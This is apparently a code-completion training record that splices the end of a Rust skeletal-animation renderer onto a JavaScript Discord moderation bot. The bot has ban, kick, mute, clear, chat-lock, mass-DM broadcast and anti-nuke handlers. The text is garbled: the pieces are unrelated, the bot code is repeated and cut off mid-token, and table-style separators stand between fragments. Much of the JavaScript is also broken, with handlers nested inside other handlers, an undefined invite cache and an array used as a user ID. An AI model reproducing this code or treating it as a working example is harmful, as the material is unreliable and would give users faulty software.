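// It is cheaper than slerp and close enough when neighbouring keyframes are
// similar, but it does not advance at constant angular speed; swapping in a
// slerp would be a possible refinement if the ai::Quaternion type offers one.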
fn update_bone_transforms(&self,
time: f64,
anim_num: uint,
scene_node: &ai::scene::Node,
parent_transform: &ai::Matrix4x4,
) {
// calculate the transformation matrix for this node
let animation = self.scene.get_animations()[anim_num];
let node_transform = match animation.find_node_anim(&scene_node.name) {
Some(node_anim) => {
self.interpolate_position(time, node_anim).translation_matrix() *
self.interpolate_rotation(time, node_anim).rotation_matrix() *
self.interpolate_scaling(time, node_anim).scaling_matrix()
},
None => {
scene_node.transformation
}
};
let node_to_global = *parent_transform * node_transform;
let opt_id = {
self.bone_map.borrow().get_id(&scene_node.name.to_string())
};
match opt_id {
None => { },
Some(id) => {
let offset = {
self.bone_map.borrow().offsets[id as uint]
};
{
self.bone_map.borrow_mut().transforms[id as uint] =
(self.global_inverse * node_to_global * offset)
.transpose().to_array();
}
}
}
for child in scene_node.get_children().iter() {
self.update_bone_transforms(time,
anim_num,
*child,
&node_to_global,
);
}
}
fn draw(&mut self,
graphics: &mut gfx::Graphics<gfx::GlDevice, gfx::GlCommandBuffer>,
frame: &gfx::Frame,
time: f64,
transform: Mat4,
) {
self.update_bone_transforms(time,
0,
self.scene.get_root_node(),
&ai::Matrix4x4::identity(),
);
graphics.device.update_buffer(self.bone_transform_buffer,
self.bone_map.borrow().transforms.as_slice(),
0,
);
for &mut component in self.batches.iter() {
component.shader_data.u_model_view_proj = transform;
graphics.draw(&component.batch, &component.shader_data, frame);
}
}
}
#[deriving(Show)]
#[vertex_format]
struct Vertex {
#[as_float]
a_position: [f32, ..3],
#[as_float]
a_normal: [f32, ..3],
#[as_float]
a_tex_coord: [f32, ..3],
#[as_float]
a_bone_weights: [f32, ..4],
a_bone_ids: [u32, ..4],
}
#[shader_param(ModelBatch)]
struct ShaderParam {
u_model_view_proj: Mat4,
/// texture for the mesh
t_color: gfx::shade::TextureParam,
/// mesh transformations caused by bones
u_bone_transformations: gfx::RawBufferHandle,
}
static VERTEX_SRC: gfx::ShaderSource<'static> = shaders! {
GLSL_150: b"
#version 150 core
in vec3 a_position;
in vec3 a_normal;
in vec3 a_tex_coord;
in vec4 a_bone_weights;
in ivec4 a_bone_ids;
out vec2 v_TexCoord;
const int MAX_BONES = 60;
uniform mat4 u_model_view_proj;
uniform u_bone_transformations {
mat4[MAX_BONES] bones;
} u_bones;
void main() {
mat4 bone_trans = u_bones.bones[a_bone_ids[0]] * a_bone_weights[0];
bone_trans += u_bones.bones[a_bone_ids[1]] * a_bone_weights[1];
bone_trans += u_bones.bones[a_bone_ids[2]] * a_bone_weights[2];
bone_trans += u_bones.bones[a_bone_ids[3]] * a_bone_weights[3];
gl_Position = u_model_view_proj * bone_trans * vec4(a_position, 1.0);
v_TexCoord = vec2(a_tex_coord);
}
"
};
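// The vertex shader above performs linear blend skinning: bone_trans is the
// weighted sum of up to four bone-palette matrices (u_bones.bones[id] * weight),
// and the bind-pose position is transformed by that blended matrix before the
// model-view-projection. This assumes each vertex's weights sum to roughly 1.0,
// which the LimitBoneWeights / PP_LBW_MAX_WEIGHTS(4) import settings in main()
// are expected to provide.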
static FRAGMENT_SRC: gfx::ShaderSource<'static> = shaders! {
GLSL_150: b"
#version 150 core
in vec2 v_TexCoord;
out vec4 o_Color;
uniform sampler2D t_color;
void main() {
vec4 tex = texture(t_color, v_TexCoord);
float blend = dot(v_TexCoord-vec2(0.5,0.5), v_TexCoord-vec2(0.5,0.5));
o_Color = mix(tex, vec4(0.0,0.0,0.0,0.0), blend*1.0);
}
"
};
#[start]
fn start(argc: int, argv: *const *const u8) -> int {
std::rt::start(argc, argv, main)
}
fn main() {
let (win_width, win_height) = (640, 480);
let mut window = Sdl2Window::new(
shader_version::opengl::OpenGL_3_2,
WindowSettings {
title: "model".to_string(),
size: [win_width, win_height],
fullscreen: false,
exit_on_esc: true,
samples: 4,
}
);
window.set_mut(CaptureCursor(true));
let mut device = gfx::GlDevice::new(|s| unsafe {
std::mem::transmute(sdl2::video::gl_get_proc_address(s))
});
let frame = gfx::Frame::new(win_width as u16, win_height as u16);
let state = gfx::DrawState::new().depth(gfx::state::LessEqual, true);
ai::log::add_log_stream(ai::log::Stdout);
let _ = device.create_sampler(
gfx::tex::SamplerInfo::new(
gfx::tex::Bilinear,
gfx::tex::Clamp
)
);
let program = device.link_program(
VERTEX_SRC.clone(),
FRAGMENT_SRC.clone()
).unwrap();
let texture_store = TextureStore::new("../assets/guard-md5",
&mut device
);
let mut graphics = gfx::Graphics::new(device);
let mut importer = ai::Importer::new();
// limit bone weights to 4 per vertex
importer.set_import_property(ai::Property::PP_LBW_MAX_WEIGHTS(4));
importer.add_processing_steps(&[
ai::Process::Triangulate,
ai::Process::GenSmoothNormals,
ai::Process::JoinIdenticalVertices,
ai::Process::LimitBoneWeights,
]);
let fname = "../assets/guard-md5/guard.md5mesh";
let ai_scene = match importer.import_from_file(fname) {
Some(scene) => scene,
None => panic!("failed to import scene: {}", fname),
};
let mut model = Model::from_file(ai_scene,
&mut graphics,
&program,
&state,
&texture_store,
);
// Rotate the model 90 deg around the x-axis
let model_view = [
[1.0, 0.0, 0.0, 0.0],
[0.0, 0.0, -1.0, 0.0],
[0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 1.0],
];
let projection = cam::CameraPerspective {
fov: 90.0f32,
near_clip: 0.1,
far_clip: 1000.0,
aspect_ratio: (win_width as f32) / (win_height as f32)
}.projection();
let mut first_person = cam::FirstPerson::new(
[0.0, 33.0, 48.0],
cam::FirstPersonSettings::keyboard_wasd()
);
first_person.velocity = 30.0f32;
first_person.settings.speed_vertical = 30.0f32;
let start = time::get_time();
let window = RefCell::new(window);
for e in Events::new(&window) {
use event::RenderEvent;
let now = time::get_time() - start;
let time = 18.0 * now.num_milliseconds() as f64 / 1e3;
let fmod = |x: f64, y: f64| -> f64 {
x - (x/y).floor() * y
};
let time = fmod(time , 140.0);
first_person.event(&e);
e.render(|args| {
graphics.clear(
gfx::ClearData {
color: [0.3, 0.3, 0.3, 1.0],
depth: 1.0,
stencil: 0,
},
gfx::COLOR | gfx::DEPTH,
&frame
);
let u_model_view_proj =
cam::model_view_projection(
model_view,
first_person.camera(args.ext_dt).orthogonal(),
projection
);
model.draw(&mut graphics,
&frame,
time,
u_model_view_proj,
);
graphics.end_frame();
});
}
}
| Model | identifier_name |
bot.js | const Discord = require('discord.js');
const client = new Discord.Client();
var prefix = "$";
client.on('ready', () => {
console.log(`Logged in as ${client.user.tag}!`);
client.user.setGame(`The Shadow for ever`,"http://twitch.tv/S-F")
console.log('')
console.log('')
console.log('╔[═════════════════════════════════════════════════════════════════]╗')
console.log(`[Start] ${new Date()}`);
console.log('╚[═════════════════════════════════════════════════════════════════]╝')
console.log('')
console.log('╔[════════════════════════════════════]╗');
console.log(`Logged in as * [ " ${client.user.username} " ]`);
console.log('')
console.log('Informations :')
console.log('')
console.log(`servers! [ " ${client.guilds.size} " ]`);
console.log(`Users! [ " ${client.users.size} " ]`);
console.log(`channels! [ " ${client.channels.size} " ]`);
console.log('╚[════════════════════════════════════]╝')
console.log('')
console.log('╔[════════════]╗')
console.log(' Bot Is Online')
console.log('╚[════════════]╝')
console.log('')
console.log('')
});
var prefix = "$";
client.on('message', function(msg) {
let verifLevels = ["None", "Low", "Medium", "(╯°□°)╯︵ ┻━┻", "┻━┻ミヽ(ಠ益ಠ)ノ彡┻━┻"];
let region = {
"brazil": "Brazil",
"eu-central": "Central Europe",
"singapore": "Singapore",
"Russia": "Russia",
"us-central": "U.S. Central",
"sydney": "Sydney",
"us-east": "U.S. East",
"us-south": "U.S. South",
"us-west": "U.S. West",
"eu-west": "Western Europe",
"vip-us-east": "VIP U.S. East",
"london": "London",
"amsterdam": "Amsterdam",
"hongkong": "Hong Kong"
};
if(msg.content.startsWith ('$server')) {
let embed = new Discord.RichEmbed()
.setColor('RANDOM')
.setThumbnail(msg.guild.iconURL)
.setTitle(`${msg.guild.name}`)
.addField('**__ Server Name | اسم السيرفر__**',`[** __${msg.guild.name}__ **]`,true)
.addField('**__ OwnerShip | الاونر الاساسي__**',`**${msg.guild.owner}**`,true)
.addField('**__ Server ID | ايدي السيرفر__**',`**${msg.guild.id}**`,true)
.addField('**__ Members Count | عدد الاعضاء__**',`[** __${msg.guild.memberCount}__ **]`,true)
.addField('**__ Online | الاعضاء الاونلاين__**',`[** __${msg.guild.members.filter(m=>m.presence.status == 'online').size}__ **]`,true)
.addField('**__ Verification Level | مستوي الحمايه__**',`[** __${verifLevels[msg.guild.verificationLevel]}__** ]`,true)
.addField('**__ Region | البلد__**',`[** __${region[msg.guild.region]}__** ]`,true)
.addField('**__ Text Channels | رومات كتابيه__**',`[** __${msg.guild.channels.filter(m => m.type === 'text').size}__** ]`,true)
.addField('**__ Voice Channels | رومات صوتيه__**',`[** __${msg.guild.channels.filter(m => m.type === 'voice').size}__ **]`,true)
.addField('**__ Created At | صنع في __**',msg.guild.createdAt.toLocaleString())
msg.channel.send({embed:embed});
}
});
client.on('message', message => {
var prefix = "$";
if(message.content === prefix + "cc") {
if(!message.channel.guild) return message.reply('** This command only for servers**');
if(!message.member.hasPermission('MANAGE_MESSAGES')) return message.reply(' **تم قفل الشات*');
message.channel.overwritePermissions(message.guild.id, {
SEND_MESSAGES: false
}).then(() => {
message.reply("**تم قفل الشات :white_check_mark: **")
});
}
//FIRE BOT
if(message.content === prefix + "oc") {
if(!message.channel.guild) return message.reply('** This command only for servers**');
if(!message.member.hasPermission('MANAGE_MESSAGES')) return message.reply('**تم فتح الشات**');
message.channel.overwritePermissions(message.guild.id, {
SEND_MESSAGES: true
}).then(() => {
message.reply("**تم فتح الشات :white_check_mark:**")
});
}
client.on('message', msg => {
if (msg.author.bot) return;
if (!msg.content.startsWith(prefix)) return;
let command = msg.content.split(" ")[0];
command = command.slice(prefix.length);
let args = msg.content.split(" ").slice(1);
if(command === "clear") {
const emoji = client.emojis.find("name", "wastebasket")
let textxt = args.slice(0).join("");
if(msg.member.hasPermission("MANAGE_MESSAGES")) {
if (textxt == "") {
msg.delete().then
msg.channel.send("***```Supply A Number ًں‘Œ```***").then(m => m.delete(3000));
} else {
msg.delete().then
msg.delete().then
msg.channel.bulkDelete(textxt);
msg.channel.send("```Cleard: " + textxt + "\n Messages```").then(m => m.delete(3000));
}
}
}
});
client.on('message', message => {
if (message.content === "$bot") {
var year = message.guild.createdAt.getFullYear()
var month = message.guild.createdAt.getMonth()
var day = message.guild.createdAt.getDate()
let embed = new Discord.RichEmbed()
.addField('**Bot Servers**',`[ ${client.guilds.size} ]`)
.addField('**Users**',`[ ${client.users.size} ]`)
.addField('**Channels**',`[ ${client.channels.size} ]`)
.addField('**ID**',`[ ${client.user.id} ]`)
.addField('**Name**',`[ ${client.user.tag} ]`)
.addField('Requested by:', "<@" + message.author.id + ">")
.setColor("#51cde6")
.setDescription(`${message.guild.name}`)
message.channel.sendEmbed(embed);
}
});;
client.on('message', message => {
if(message.content.includes('discord.gg')){
if(!message.channel.guild) return message.reply('** advertising me on DM ? **');
if (!message.member.hasPermissions(['ADMINISTRATOR'])){
message.delete()
return message.reply(`** No Invite Links !**`)
}
}
});
var AsciiTable = require('ascii-data-table').default
client.on('message', message =>{
if(message.content == "#roles"){
if(message.guild.member(message.author).hasPermission("ADMINISTRATOR"))
var
ros=message.guild.roles.size,
data = [['Rank', 'RoleName']]
for(let i =0;i<ros;i++){
if(message.guild.roles.array()[i].id !== message.guild.id){
data.push([i,`${message.guild.roles.filter(r => r.position == ros-i).map(r=>r.name)}`])
}}
let res = AsciiTable.table(data)
message.channel.send(`**\`\`\`xl\n${res}\`\`\`**`);
}
});
var guilds = {};
client.on('guildBanAdd', function(guild) {
const rebellog = client.channels.find("name", "log"),
Onumber = 10,
Otime = 10000
guild.fetchAuditLogs({
type: 22
}).then(audit => {
let banner = audit.entries.map(banner => banner.executor.id)
// count bans per executor for this guild (keyed by guild id + executor id)
if (!guilds[guild.id + banner]) {
guilds[guild.id + banner] = {
bans: 0
}
}
guilds[guild.id + banner].bans += 3;
if(guilds[guild.id + banner].bans >= Onumber) {
try {
let roles = guild.members.get(banner).roles.array();
guild.members.get(banner).removeRoles(roles);
} catch (error) {
console.log(error)
try {
guild.members.get(banner).removeRoles(roles);
rebellog.send(`<@!${banner.id}>
حآول العبث بالسيرفر @everyone`);
guild.owner.send(`<@!${banner.id}>
حآول العبث بالسيرفر ${guild.name}`)
setTimeout(() => {
guilds[guild.id + banner].bans = 0;
},Otime)
} catch (error) {
console.log(error)
}
}
}
})
});
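// The handler above acts as a rough anti-nuke guard: it counts bans per
// executor (keyed by guild id + executor id) and, once the count reaches
// `Onumber` within the `Otime` window, strips that executor's roles and
// notifies the log channel and the guild owner.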
let channelc = {};
client.on('channelCreate', async (channel) => {
const rebellog = client.channels.find("name", "log"),
Oguild = channel.guild,
Onumber = 10,
Otime = 10000;
const audit = await channel.guild.fetchAuditLogs({limit: 1});
const channelcreate = audit.entries.first().executor;
console.log(` A ${channel.type} Channel called ${channel.name} was Created By ${channelcreate.tag}`);
if(!channelc[channelcreate.id]) {
channelc[channelcreate.id] = {
created : 0
}
}
channelc[channelcreate.id].created += 3;
if(channelc[channelcreate.id].created >= Onumber ) {
let roles = channel.guild.members.get(channelcreate.id).roles.array();
channel.guild.members.get(channelcreate.id).removeRoles(roles);
rebellog.send(`<@!${channelcreate.id}>
حآول العبث بالسيرفر @everyone`);
channel.guild.owner.send(`<@!${channelcreate.id}>
حآول العبث بالسيرفر ${channel.guild.name}`)
}
setTimeout(() => {
channelc[channelcreate.id].created = 0;
},Otime)
});
let channelr = {};
client.on('channelDelete', async (channel) => {
const rebellog = client.channels.find("name", "log"),
Oguild = channel.guild,
Onumber = 10,
Otime = 10000;
const audit = await channel.guild.fetchAuditLogs({limit: 1});
const channelremover = audit.entries.first().executor;
console.log(` A ${channel.type} Channel called ${channel.name} was deleted By ${channelremover.tag}`);
if(!channelr[channelremover.id]) {
channelr[channelremover.id] = {
deleted : 0
}
}
client.on('message', message => {
var prefix = "$";
if (message.author.id === client.user.id) return;
if (message.guild) {
let embed = new Discord.RichEmbed()
let args = message.content.split(' ').slice(1).join(' ');
if(message.content.split(' ')[0] == prefix + 'bc') {
if (!args[1]) {
message.channel.send("**اكتب شي بعد الكوماند**");
return;
}
message.guild.members.forEach(m => {
if(!message.member.hasPermission('ADMINISTRATOR')) return;
var bc = new Discord.RichEmbed()
.addField('» السيرفر :', `${message.guild.name}`)
.addField('» المرسل : ', `${message.author.username}#${message.author.discriminator}`)
.addField(' » الرسالة : ', args)
.setColor('#ff0000')
// m.send(`[${m}]`);
m.send(`${m}`,{embed: bc});
});
}
} else {
return;
}
});
client.on('guildMemberAdd', member => {
member.guild.fetchInvites().then(guildInvites => {
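// NOTE: `invites` is expected to be a per-guild cache of invite collections
// built elsewhere (typically by fetching every guild's invites on 'ready');
// it is not defined anywhere in this file, so this lookup will throw as-is.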
const ei = invites[member.guild.id];
const invite = guildInvites.find(i => ei.get(i.code).uses < i.uses);
const inviter = client.users.get(invite.inviter.id);
const channel = member.guild.channels.find("name", "✽-welcome");
channel.send(`<@${member.user.id}> ** joined; ** Invited by ** <@${inviter.id}> ** `);
});
});
client.on('message', message => {
var prefix = "$"
if (message.content.startsWith(prefix + 'id')) {
if (message.author.bot) return
if (!message.guild) return message.reply('**This Command Just In Servers**')
message.guild.fetchInvites().then(invs => {
let personalInvites = invs.filter(i => i.inviter.id === message.author.id)
let inviteCount = personalInvites.reduce((p, v) => v.uses + p, 0)
var roles = message.member.roles.map(roles => `**__${roles.name}__ |**`).join(` `)
let id = new Discord.RichEmbed()
.setColor('RANDOM')
.setTitle(':clipboard: | User identity info')
.setAuthor(message.author.username,message.author.avatarURL)
.addField('• Name :', message.author.username,true)
.addField('• Tag :', message.author.discriminator,true)
.addField('• ID :', message.author.id,true)
// note: requires the 'moment' package (not required anywhere in this snippet)
.addField('• JoinedAt :', moment(message.member.joinedAt).format('D/M/YYYY h:mm a '),true)
.addField('• CreatedAt :', moment(message.author.createdAt).format('D/M/YYYY h:mm a '),true)
.addField('• Total invites :', inviteCount,true)
.addField('• Roles :', roles)
.setTimestamp()
message.channel.sendEmbed(id).then(c => {
c.react('📋')
})
})
}
});
var prefix = "$"
client.on("message", (message) => {
if (message.content.startsWith("${prefix}kick")) {
if(!message.member.hasPermission('KICK_MEMBERS')) return message.reply('? ماعندك الصلاحيات');
var member= message.mentions.members.first();
member.kick().then((member) => {
message.channel.send(member.displayName + " مع السلامه :wave: ");
}).catch(() => {
message.channel.send("Error -_-");
});
}
});
var prefix = "$"
client.on('message', message => {
if (message.author.bot) return;
if (!message.content.startsWith(prefix)) return;
let command = message.content.split(" ")[0];
command = command.slice(prefix.length);
let args = message.content.split(" ").slice(1);
if (command == "ban") {
if(!message.channel.guild) return message.reply('** This command only for servers**');
if(!message.guild.member(message.author).hasPermission("BAN_MEMBERS")) return message.reply("**You Don't Have ` BAN_MEMBERS ` Permission**");
if(!message.guild.member(client.user).hasPermission("BAN_MEMBERS")) return message.reply("**I Don't Have ` BAN_MEMBERS ` Permission**");
let user = message.mentions.users.first();
let reason = message.content.split(" ").slice(2).join(" ");
/*let bErenaalog = client.channels.find("name", "Erenaa-log");
if(!bErenaalog) return message.reply("I've detected that this server doesn't have a Erenaa-log text channel.");*/
if (message.mentions.users.size < 1) return message.reply("**منشن شخص**");
if(!reason) return message.reply ("**اكتب سبب الطرد**");
if (!message.guild.member(user)
.bannable) return message.reply("**لايمكنني طرد شخص اعلى من رتبتي يرجه اعطاء البوت رتبه عالي**");
message.guild.member(user).ban(7, user);
const banembed = new Discord.RichEmbed()
.setAuthor(`BANNED!`, user.displayAvatarURL)
.setColor("RANDOM")
.setTimestamp()
.addField("**User:**", '**[ ' + `${user.tag}` + ' ]**')
.addField("**By:**", '**[ ' + `${message.author.tag}` + ' ]**')
.addField("**Reason:**", '**[ ' + `${reason}` + ' ]**')
message.channel.send({
embed : banembed
})
}
});
client.on('message', message => {
if(!message.channel.guild) return;
if(message.content.startsWith(prefix + 'move')) {
if (message.member.hasPermission("MOVE_MEMBERS")) {
if (message.mentions.users.size === 0) {
return message.channel.send("``لاستخدام الأمر اكتب هذه الأمر : " +prefix+ "move [USER]``")
}
if (message.member.voiceChannel != null) {
if (message.mentions.members.first().voiceChannel != null) {
var authorchannel = message.member.voiceChannelID;
var usermentioned = message.mentions.members.first().id;
var embed = new Discord.RichEmbed()
.setTitle("Succes!")
.setColor("#000000")
.setDescription(`لقد قمت بسحب <@${usermentioned}> الى الروم الصوتي الخاص بك✅ `)
var embed = new Discord.RichEmbed()
.setTitle(`You are Moved in ${message.guild.name}`)
.setColor("RANDOM")
.setDescription(`**<@${message.author.id}> Moved You To His Channel!\nServer --> ${message.guild.name}**`)
message.guild.members.get(usermentioned).setVoiceChannel(authorchannel).then(m => message.channel.send(embed))
message.guild.members.get(usermentioned).send(embed)
} else {
message.channel.send("``لا تستطيع سحب "+ message.mentions.members.first() +" `يجب ان يكون هذه العضو في روم صوتي`")
}
} else {
message.channel.send("**``يجب ان تكون في روم صوتي لكي تقوم بسحب العضو أليك``**")
}
} else {
message.react("❌")
}}}) | nd('name', 'Muted');
if (!muteRole) return message.reply(" I Can’t Find 'Muted' Role ").catch(console.error).then(message => message.delete(4000))
if (message.mentions.users.size < 1) return message.reply(' Error : ``Mention a User``').catch(console.error).then(message => message.delete(4000))
if (!message.guild.member(client.user).hasPermission('MANAGE_ROLES_OR_PERMISSIONS')) return;
if (message.guild.member(user).removeRole(muteRole.id)) {
return message.reply("User Has Been UnMuted.").catch(console.error).then(message => message.delete(4000))
} else {
message.guild.member(user).removeRole(muteRole).then(() => {
return message.reply("User Has Been UnMuted.").catch(console.error).then(message => message.delete(4000))
});
}
};
});
client.on('message',function(message) {
if(!message.channel.guild) return; let messageArray = message.content.split(' ');
let muteRole = message.guild.roles.find('name', 'Muted');
let muteMember = message.mentions.members.first();
let muteReason = messageArray[2];
let muteDuration = messageArray[3];
if (message.content.split(" ")[0].toLowerCase() === prefix + "mute") {
if (message.author.bot) return;
if(!muteRole) return message.guild.createRole({name: 'Muted'}).then(message.guild.channels.forEach(chan => chan.overwritePermissions(muteRole, {SEND_MESSAGES:false,ADD_REACTIONS:false})));
if(!message.guild.member(message.author).hasPermission("MANAGE_ROLES")) return message.channel.send(' Error : You Need `` MANAGE_ROLES ``Permission ');
if(!message.guild.member(client.user).hasPermission("MANAGE_ROLES")) return message.channel.send(' Error : I Don’t Have `` MANAGE_ROLES ``Permission ');
if(!muteMember) return message.channel.send(' Error : ``Mention a User``').then(message => message.delete(4000))
if(!muteReason) return message.channel.send(' Error : ``Supply a Reason``').then(message => message.delete(4000))
if(!muteDuration) return message.channel.send(' Error : `` Supply Mute Time `` \n Ex: #mute @user reason 1m ').then(message => message.delete(4000))
if(!muteDuration.match(/[1-7][s,m,h,d,w]/g)) return message.channel.send(' Error : `` Invalid Mute Duration``').then(message => message.delete(4000))
message.channel.send(`${muteMember} Has Been Muted.`).then(message => message.delete(5000))
muteMember.addRole(muteRole);
muteMember.setMute(true)
.then(() => { setTimeout(() => {
muteMember.removeRole(muteRole)
muteMember.setMute(false)
}, ms(muteDuration));
});
}
});
client.login(process.env.BOT_TOKEN);
| ;
const ms = require("ms");
client.on("message", message => {
if(!message.channel.guild) return;
if (message.author.bot) return;
let command = message.content.split(" ")[0];
if (message.content.split(" ")[0].toLowerCase() === prefix + "unmute") {
if (!message.member.hasPermission('MANAGE_ROLES')) return;
let user = message.mentions.users.first();
let modlog = client.channels.find('name', 'log');
let muteRole = client.guilds.get(message.guild.id).roles.fi | conditional_block |
bot.js | const Discord = require('discord.js');
const client = new Discord.Client();
var prefix = "$";
client.on('ready', () => {
console.log(`Logged in as ${client.user.tag}!`);
client.user.setGame(`The Shadow for ever`,"http://twitch.tv/S-F")
console.log('')
console.log('')
console.log('╔[═════════════════════════════════════════════════════════════════]╗')
console.log(`[Start] ${new Date()}`);
console.log('╚[═════════════════════════════════════════════════════════════════]╝')
console.log('')
console.log('╔[════════════════════════════════════]╗');
console.log(`Logged in as * [ " ${client.user.username} " ]`);
console.log('')
console.log('Informations :')
console.log('')
console.log(`servers! [ " ${client.guilds.size} " ]`);
console.log(`Users! [ " ${client.users.size} " ]`);
console.log(`channels! [ " ${client.channels.size} " ]`);
console.log('╚[════════════════════════════════════]╝')
console.log('')
console.log('╔[════════════]╗')
console.log(' Bot Is Online')
console.log('╚[════════════]╝')
console.log('')
console.log('')
});
var prefix = "$";
client.on('message', function(msg) {
let verifLevels = ["None", "Low", "Medium", "(╯°□°)╯︵ ┻━┻", "┻━┻ミヽ(ಠ益ಠ)ノ彡┻━┻"];
let region = {
"brazil": "Brazil",
"eu-central": "Central Europe",
"singapore": "Singapore",
"Russia": "Russia",
"us-central": "U.S. Central",
"sydney": "Sydney",
"us-east": "U.S. East",
"us-south": "U.S. South",
"us-west": "U.S. West",
"eu-west": "Western Europe",
"vip-us-east": "VIP U.S. East",
"london": "London",
"amsterdam": "Amsterdam",
"hongkong": "Hong Kong"
};
if(msg.content.startsWith ('$server')) {
let embed = new Discord.RichEmbed()
.setColor('RANDOM')
.setThumbnail(msg.guild.iconURL)
.setTitle(`${msg.guild.name}`)
.addField('**__ Server Name | اسم السيرفر__**',`[** __${msg.guild.name}__ **]`,true)
.addField('**__ OwnerShip | الاونر الاساسي__**',`**${msg.guild.owner}**`,true)
.addField('**__ Server ID | ايدي السيرفر__**',`**${msg.guild.id}**`,true)
.addField('**__ Members Count | عدد الاعضاء__**',`[** __${msg.guild.memberCount}__ **]`,true)
.addField('**__ Online | الاعضاء الاونلاين__**',`[** __${msg.guild.members.filter(m=>m.presence.status == 'online').size}__ **]`,true)
.addField('**__ Verification Level | مستوي الحمايه__**',`[** __${verifLevels[msg.guild.verificationLevel]}__** ]`,true)
.addField('**__ Region | البلد__**',`[** __${region[msg.guild.region]}__** ]`,true)
.addField('**__ Text Channels | رومات كتابيه__**',`[** __${msg.guild.channels.filter(m => m.type === 'text').size}__** ]`,true)
.addField('**__ Voice Channels | رومات صوتيه__**',`[** __${msg.guild.channels.filter(m => m.type === 'voice').size}__ **]`,true)
.addField('**__ Created At | صنع في __**',msg.guild.createdAt.toLocaleString())
msg.channel.send({embed:embed});
}
});
client.on('message', message => {
var prefix = "$";
if(message.content === prefix + "cc") {
if(!message.channel.guild) return message.reply('** This command only for servers**');
if(!message.member.hasPermission('MANAGE_MESSAGES')) return message.reply(' **تم قفل الشات*');
message.channel.overwritePermissions(message.guild.id, {
SEND_MESSAGES: false
}).then(() => {
message.reply("**تم قفل الشات :white_check_mark: **")
});
}
//FIRE BOT
if(message.content === prefix + "oc") {
if(!message.channel.guild) return message.reply('** This command only for servers**');
if(!message.member.hasPermission('MANAGE_MESSAGES')) return message.reply('**تم فتح الشات**');
message.channel.overwritePermissions(message.guild.id, {
SEND_MESSAGES: true
}).then(() => {
message.reply("**تم فتح الشات :white_check_mark:**")
});
}
client.on('message', msg => {
if (msg.author.bot) return;
if (!msg.content.startsWith(prefix)) return;
let command = msg.content.split(" ")[0];
command = command.slice(prefix.length);
let args = msg.content.split(" ").slice(1);
if(command === "clear") {
const emoji = client.emojis.find("name", "wastebasket")
let textxt = args.slice(0).join("");
if(msg.member.hasPermission("MANAGE_MESSAGES")) {
if (textxt == "") {
msg.delete().then
msg.channel.send("***```Supply A Number ًں‘Œ```***").then(m => m.delete(3000));
} else {
msg.delete().then
msg.delete().then
msg.channel.bulkDelete(textxt);
msg.channel.send("```Cleard: " + textxt + "\n Messages```").then(m => m.delete(3000));
}
}
}
});
client.on('message', message => {
if (message.content === "$bot") {
var year = message.guild.createdAt.getFullYear()
var month = message.guild.createdAt.getMonth()
var day = message.guild.createdAt.getDate()
let embed = new Discord.RichEmbed()
.addField('**Bot Servers**',`[ ${client.guilds.size} ]`)
.addField('**Users**',`[ ${client.users.size} ]`)
.addField('**Channels**',`[ ${client.channels.size} ]`)
.addField('**ID**',`[ ${client.user.id} ]`)
.addField('**Name**',`[ ${client.user.tag} ]`)
.addField('Requested by:', "<@" + message.author.id + ">")
.setColor("#51cde6")
.setDescription(`${message.guild.name}`)
message.channel.sendEmbed(embed);
}
});;
client.on('message', message => {
if(message.content.includes('discord.gg')){
if(!message.channel.guild) return message.reply('** advertising me on DM ? **');
if (!message.member.hasPermissions(['ADMINISTRATOR'])){
message.delete()
return message.reply(`** No Invite Links !**`)
}
}
});
var AsciiTable = require('ascii-data-table').default
client.on('message', message =>{
if(message.content == "#roles"){
if(message.guild.member(message.author).hasPermission("ADMINISTRATOR"))
var
ros=message.guild.roles.size,
data = [['Rank', 'RoleName']]
for(let i =0;i<ros;i++){
if(message.guild.roles.array()[i].id !== message.guild.id){
data.push([i,`${message.guild.roles.filter(r => r.position == ros-i).map(r=>r.name)}`])
}}
let res = AsciiTable.table(data)
message.channel.send(`**\`\`\`xl\n${res}\`\`\`**`);
}
}); |
var guilds = {};
client.on('guildBanAdd', function(guild) {
const rebellog = client.channels.find("name", "log"),
Onumber = 10,
Otime = 10000
guild.fetchAuditLogs({
type: 22
}).then(audit => {
let banner = audit.entries.map(banner => banner.executor.id)
// count bans per executor for this guild (keyed by guild id + executor id)
if (!guilds[guild.id + banner]) {
guilds[guild.id + banner] = {
bans: 0
}
}
guilds[guild.id + banner].bans += 3;
if(guilds[guild.id + banner].bans >= Onumber) {
try {
let roles = guild.members.get(banner).roles.array();
guild.members.get(banner).removeRoles(roles);
} catch (error) {
console.log(error)
try {
guild.members.get(banner).removeRoles(roles);
rebellog.send(`<@!${banner.id}>
حآول العبث بالسيرفر @everyone`);
guild.owner.send(`<@!${banner.id}>
حآول العبث بالسيرفر ${guild.name}`)
setTimeout(() => {
guilds[guild.id + banner].bans = 0;
},Otime)
} catch (error) {
console.log(error)
}
}
}
})
});
let channelc = {};
client.on('channelCreate', async (channel) => {
const rebellog = client.channels.find("name", "log"),
Oguild = channel.guild,
Onumber = 10,
Otime = 10000;
const audit = await channel.guild.fetchAuditLogs({limit: 1});
const channelcreate = audit.entries.first().executor;
console.log(` A ${channel.type} Channel called ${channel.name} was Created By ${channelcreate.tag}`);
if(!channelc[channelcreate.id]) {
channelc[channelcreate.id] = {
created : 0
}
}
channelc[channelcreate.id].created += 3;
if(channelc[channelcreate.id].created >= Onumber ) {
let roles = channel.guild.members.get(channelcreate.id).roles.array();
channel.guild.members.get(channelcreate.id).removeRoles(roles);
rebellog.send(`<@!${channelcreate.id}>
حآول العبث بالسيرفر @everyone`);
channel.guild.owner.send(`<@!${channelcreate.id}>
حآول العبث بالسيرفر ${channel.guild.name}`)
}
setTimeout(() => {
channelc[channelcreate.id].created = 0;
},Otime)
});
let channelr = {};
client.on('channelDelete', async (channel) => {
const rebellog = client.channels.find("name", "log"),
Oguild = channel.guild,
Onumber = 10,
Otime = 10000;
const audit = await channel.guild.fetchAuditLogs({limit: 1});
const channelremover = audit.entries.first().executor;
console.log(` A ${channel.type} Channel called ${channel.name} was deleted By ${channelremover.tag}`);
if(!channelr[channelremover.id]) {
channelr[channelremover.id] = {
deleted : 0
}
}
client.on('message', message => {
var prefix = "$";
if (message.author.id === client.user.id) return;
if (message.guild) {
let embed = new Discord.RichEmbed()
let args = message.content.split(' ').slice(1).join(' ');
if(message.content.split(' ')[0] == prefix + 'bc') {
if (!args[1]) {
message.channel.send("**اكتب شي بعد الكوماند**");
return;
}
message.guild.members.forEach(m => {
if(!message.member.hasPermission('ADMINISTRATOR')) return;
var bc = new Discord.RichEmbed()
.addField('» السيرفر :', `${message.guild.name}`)
